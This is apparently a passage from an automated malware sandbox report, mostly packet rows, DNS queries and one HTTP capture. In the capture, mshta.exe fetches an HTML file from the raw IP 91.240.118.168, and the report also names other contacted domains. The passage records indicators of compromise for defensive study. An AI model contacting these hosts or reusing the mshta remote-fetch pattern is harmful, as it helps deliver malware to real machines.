                                                                                                                    Jan 28, 2022 21:08:02.658938885 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.658993959 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.661266088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.661287069 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.661343098 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.663722038 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.663744926 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.663814068 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.665992975 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.666012049 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.666075945 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.668366909 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.668390036 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.668452024 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.670773983 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.670794964 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.670845985 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.673069954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.673090935 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.673146009 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.675441980 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.675467014 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.675528049 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.677876949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.677897930 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.677951097 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.680170059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.680191994 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.680252075 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.688534975 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.688561916 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.688654900 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.697288990 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.697318077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.697444916 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.706671953 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.706696987 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.706856966 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.714202881 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.714229107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.714337111 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.723946095 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.723973036 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.724070072 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.729944944 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.729969978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.730068922 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.737402916 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.737427950 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.737517118 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.789757967 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.789783001 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.789896965 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.790493965 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.790513039 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.790554047 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.792108059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.792129040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.792167902 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.793746948 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.793766975 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.793812990 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.795371056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.795391083 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.795445919 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.796998978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.797018051 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.797070980 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.798547029 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.798567057 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.798623085 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.800105095 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.800124884 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.800180912 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.801676035 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.801695108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.801745892 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.802937031 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.803206921 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.803225040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.803287983 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.804702997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.805921078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.805989981 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.806291103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.806310892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.806360960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.807735920 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.807754993 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.807811975 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.809205055 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.809225082 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.809288025 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.810699940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.810724974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.810784101 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.812216997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.812243938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.812294960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.813651085 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.813676119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.813730001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.815224886 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.815249920 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.815327883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.816567898 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.816591024 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.816654921 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.818116903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.818142891 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.818207026 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.819381952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.819406986 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.819461107 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.820858955 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.820884943 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.820935011 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.822191000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.822216034 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.822259903 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.823611021 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.823640108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.823713064 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.826119900 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826143026 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826191902 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.826297998 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826318979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826376915 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.827980995 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.828005075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.828068972 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.830079079 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830107927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830162048 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.830842018 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830847979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830905914 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.832258940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.832278013 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.832338095 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.833250046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.833271027 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.833357096 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.834084988 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.834103107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.834161043 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.835380077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.835407019 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.835464954 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839131117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839154005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839169979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839184999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839226007 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839247942 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839657068 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839679003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839728117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.840919971 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.840948105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.841028929 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.842196941 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.842225075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.842273951 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.843283892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.843307972 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.843354940 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.844433069 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.844455957 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.844527960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.845592022 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.845614910 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.845680952 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.846071005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.846087933 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.846153975 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.847984076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850502968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850531101 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850590944 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.852312088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.855098963 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.964931011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.964958906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965023041 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.965315104 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965333939 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965385914 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.966495991 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966521978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966538906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966609001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.967572927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.967592955 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.967665911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.968723059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.968748093 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.968821049 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.969926119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.969958067 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.969997883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.970949888 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.970972061 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.971026897 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.972662926 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.972691059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.972764969 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.973150015 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.973175049 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.973225117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.974273920 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.974304914 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.974370956 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.975383997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.975415945 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.975496054 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.976526022 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.976552963 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.976623058 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.977694035 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.977724075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.977790117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.978755951 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.978784084 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.978868961 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.979846954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.979875088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.979938030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.980938911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.980967999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.981046915 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.982070923 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.982104063 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.982177019 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.983197927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.983225107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.983304024 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.984291077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.984323978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.984395027 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.985440969 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.985467911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.985512018 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.986558914 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.986588001 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.986720085 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.987719059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.987751961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.987803936 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.988785982 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.988815069 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.988897085 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.989860058 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.989891052 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.989944935 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.991004944 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.991033077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.991077900 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.992191076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.992213011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.992259026 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.993201017 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.993222952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.993272066 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.996100903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:03.278975010 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:08.584625006 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:16.723890066 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:16.724050999 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:05.668911934 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:09:05.669039965 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:09:40.695022106 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:09:40.753664017 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:09:40.803534031 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:09:40.823297024 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:09:40.823441029 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:09:43.019146919 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:43.439780951 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:44.266711950 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:45.936044931 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:49.212316036 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:09:55.827265024 CET4917080192.168.2.2274.208.236.157

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:08:00.706188917 CET5216753192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:08:00.730050087 CET53521678.8.8.8192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.320576906 CET5059153192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:08:01.345886946 CET53505918.8.8.8192.168.2.22

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Jan 28, 2022 21:08:00.706188917 CET192.168.2.228.8.8.80xd877Standard query (0)kuyporn.comA (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:08:01.320576906 CET192.168.2.228.8.8.80x54f5Standard query (0)jeffreylubin.igclout.comA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Jan 28, 2022 21:08:00.730050087 CET8.8.8.8192.168.2.220xd877No error (0)kuyporn.com172.67.149.209A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:08:00.730050087 CET8.8.8.8192.168.2.220xd877No error (0)kuyporn.com104.21.11.177A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:08:01.345886946 CET8.8.8.8192.168.2.220x54f5No error (0)jeffreylubin.igclout.com74.208.236.157A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • 91.240.118.168
                                                                                                                    • kuyporn.com
                                                                                                                    • jeffreylubin.igclout.com

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.224916791.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:07:54.688672066 CET0OUTGET /qqw/aas/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:07:54.750778913 CET2INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:07:54 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 11230
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:39:54 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1cdba-2bde"
                                                                                                                    Accept-Ranges: bytes
